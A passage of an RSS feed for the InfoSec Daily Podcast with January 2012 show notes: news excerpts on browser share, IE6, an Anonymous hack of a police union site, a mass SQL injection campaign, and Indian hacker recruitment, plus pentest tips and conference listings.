	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the</span><a href="http://www.netmarketshare.com/browser-market-share.aspx?qprid=1&amp;qpcustomb=0"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> desktop browser market</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, months-long trends continued unabated. The top dog, Microsoft&#39;s Internet Explorer, fell from 52.6 percent to 51.9 percent. Mozilla&#39;s Firefox also fell, 22.1 percent to 21.8 percent, while Google&#39;s Chrome rose from 18.2 percent to 19.1 percent.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.flyingpenguin.com/?p=15273"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.flyingpenguin.com/?p=15273</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The end of December 2011 marked a significant milestone for IE6 measurement. The U.S. finally has dropped below 1% usage. &nbsp;Things even are looking good for bright red China, which</span><a href="http://www.ie6countdown.com/#map"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> still sits over 25% (4% of the world)</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> but has dropped a whopping 10% in under a year.</span><img height="343px;" src="https://lh4.googleusercontent.com/Afnrj1182oHe2Wclmjrm64Pr0iu2674vNvBU7B1FwZK4JXFD4JT3fkycFN932xjS-bANdo5XySa90lCZSzdXcJ9irg0eIH0h9a2GTLaX-mHCzZxzkN0" width="610px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is possible that</span><a href="http://msdn.microsoft.com/en-us/library/ms537509%28v=vs.85%29.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> measurement methods</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> may be skewed by proxies and bogus tokens but the more likely story is that China is on a browser support time-line that can&#39;t seem to get past an OS introduction date.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This reminds me of a time years ago when I was called in by a huge software-as-a-service provider and asked how to get SSLv2 through a PCI DSS assessment. &quot;Why would you want to do that&quot; I asked. &quot;We have a lot of IE6 users&quot; was their reply.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">My response was twofold. First, I questioned whether IE6 data and SSLv2 data was trusted. Browsers can negotiate down to SSLv2 but that does not mean they were incapable of running SSLv3 or better. Perhaps if they dug into the data they would find a different picture and see far less IE6. Second, I recommend to post a warning banner to any IE6 user to upgrade their browser within a set time-frame or with a count-down clock. Even something like</span><a href="http://www.ie6countdown.com/join-us.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> an orange warning banner would be nice</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/anonymous-leaks-info-following-california-police-union-website-hack-010312"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/anonymous-leaks-info-following-california-police-union-website-hack-010312</span></a></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The website for California&rsquo;s Statewide Law Enforcement Association (CSLEA) union remained offline Tuesday following the announcement of a hack by well-known hacktivist group Anonymous over the holiday weekend.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In part of what the group has deemed &ldquo;pr0j3ct m4hy3m,&rdquo; (project mayhem) Anonymous released approximately 2,500 names, addresses and phone numbers of those affiliated with the union, many of them police officers, according to</span><a href="http://www.news10.net/news/article/171017/2/CSLEA-members-react-to-Anonymous-hacking"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sacramento&rsquo;s News 10</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. The group also published some of the members&rsquo; credit card information taken from the group&rsquo;s online gift shop.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hack was made public by a tweet from</span><a href="https://twitter.com/#%21/YourAnonNews/status/153286252911796225"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> @YourAnonNews late Saturday</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &ldquo;BREAKING: California Statewide Law Enforcement Agency DEFACED and PWNT by #AntiSec #Anonymous.&rdquo; A note on the site, also linked to in the tweet and</span><a href="http://pastebin.com/MSaBvt9R"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> now published on Pastebin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, claims that thousands of police user names and passwords had been circulated across Anonymous channels for the two months leading up to the disclosure of the hack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As Threatpost previously reported, private e-mail correspondence belonging to Fred Baclagan, a special agent with the California Department of Justice, was initially leaked as part of this hack in mid-November.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.securitypark.co.uk/security_article267100.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitypark.co.uk/security_article267100.html</span></a></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It has been reported that the so-called `Lilupophilupop.com&rsquo; SQL injection attack has now compromised more than a million sites.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Imperva comments and says the fact that the number of site comprises has soared in just a few weeks highlights the issue that SQL attacks are still a major problem for companies hosting Web sites and their users.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Rob Rachwald, Director of Security Strategy with the data security specialist, SQL injection is now the most pernicious vulnerability in human computer history.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Over the last six year years, our research has shown that SQL injection has been responsible for 83 per cent of successful hacking-related data breaches and &ndash; as incidents like this confirm &ndash; the trend is clearly rising. Perhaps worse, with hackers automating their attacks, no-one who hosts a Web application is immune,&rdquo; he said.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Our report of last September (</span><a href="http://bit.ly/vxB5uI"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://bit.ly/vxB5uI</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) found that Web applications suffered an average of 71 SQL injection attempts every hour &ndash; that&rsquo;s more than one a minute. Specific applications, meanwhile, were found to occasionally be under aggressive attack, with peaks of between 800 and 1,200 attacks an hour &ndash; i.e. one attack every 3.0 to 4.5 seconds,&rdquo; he added.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rachwald explained that defending against SQL injection attacks is no easy task, since databases are integral components of Web applications.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.globalpost.com/dispatch/news/regions/asia-pacific/india/111204/india-hackers-technology-computers"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.globalpost.com/dispatch/news/regions/asia-pacific/india/111204/india-hackers-technology-computers</span></a></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To paraphrase an old saw: It takes a geek to catch a geek. That&#39;s the logic behind a new Indian response to the growing threat of cyber war, anyway.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Indian authorities were stunned by the impact of the Stuxnet virus on Iran&#39;s nuclear facility at Natanz last year. Now, in the wake of repeated assaults on Indian company and government web sites, an organization of self-professed &quot;white hat&quot; hackers is recruiting its own army.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;If you see the statistics, less than 15 percent of Indians use the internet, but we are already No. 1 when it comes to virus infections and we are No. 2 in cyber crimes,&rdquo; said Rajshekhar Murthy, an Indian hacker and entrepreneur.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last month, at Malcon &mdash; the malware conference Murthy founded in 2010 &mdash; the security expert&#39;s nonprofit Information Security and Analysis Center (ISAC) unveiled plans to create a national registry of hackers with the training to protect the country&#39;s critical electronic infrastructure.</span></p>
<p dir="ltr" style="margin: 0pt 5pt 0pt 1pt;">&nbsp;</p>
<p dir="ltr" id="internal-source-marker_0.6448933620174295" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">नहीं टिकटिक मल (Don&rsquo;t Click Shit)</span></p>
<p dir="ltr" style="margin-left: 1pt;margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">करते बकवास बात नहीं (Don&rsquo;t Talk Shit)</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-559-pentest-lessons-mobile-browsing-ie6-anonymous-sqli-and-%e0%a4%b9%e0%a5%88%e0%a4%95%e0%a4%b0-%e0%a4%95%e0%a5%80-%e0%a4%b8%e0%a5%87%e0%a4%a8%e0%a4%be/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3331/0/infosec-daily-podcast-episode-559.mp3" length="19208295" type="audio/mpeg" />
		<itunes:duration>0:39:58</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 559 for January 4, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Br[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 559 for January 4, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons:
	Adam Compton &#38; Zac Wagle&#39;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account: https://twitter.com/pentestlessons.
	Lesson 1: Know not only how to use the tool, but what the tool can/cannot do.
	Lesson 2: ALWAYS read the Statement of Work (SOW) before you show-up on-site. &#160;
	Lesson 3: Write down what you&#39;ve found, include the how and when* 
	Lesson 4: When you run an exploit, don&#8217;t do it blindly. Always, always, know what the exploit does, and how it will affect the machine you&#8217;re attacking. (deploying an &#8220;agent&#8221; means you`ve exploited the machine)
	* Very Important 
	&#160;
Stories
Source: &#160;http://news.cnet.com/8301-30685_3-57350968-264/mobile-browsing-reaches-all-time-high
If you haven&#39;t whipped your Web site into shape for easy viewing on small-screen devices, you&#39;d better get cracking.
	Mobile browsing reached its highest levels so far, 7.7 percent of total browser usage, in December.
	(Credit: Net Applications)
	That&#39;s because the use of mobile devices reached an all-time high in December, accounting for 7.7 percent of browser usage according to Net Applications&#39; measurements of daily visits to its network of 40,000 Web sites. That may still be a small fraction of total Web traffic, but it&#39;s a large and growing population in absolute numbers.
	Tablet browsing in many ways is similar to desktop browsing; screen resolution on the dominant iPad and iPad 2 aren&#39;t that far off a laptop. But touch interfaces are different from mouse interfaces, especially when it comes to tapping buttons with precision. And smaller tablets are awkwardly in between the iPad and mobile-phone scr[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 558 &#8211; Care2, AA Phishing, Yea! India, Israel CC &amp; BigMac Scam/Spam</title>
		<link>http://www.isdpodcast.com/episode-558-care2-aa-phishing-yea-india-israel-cc-bigmac-scamspam</link>
		<comments>http://www.isdpodcast.com/episode-558-care2-aa-phishing-yea-india-israel-cc-bigmac-scamspam#comments</comments>
		<pubDate>Wed, 04 Jan 2012 01:52:25 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3326</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 558 for January 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 558 for January 3, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 9-13 <br class="kix-line-break" /><br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
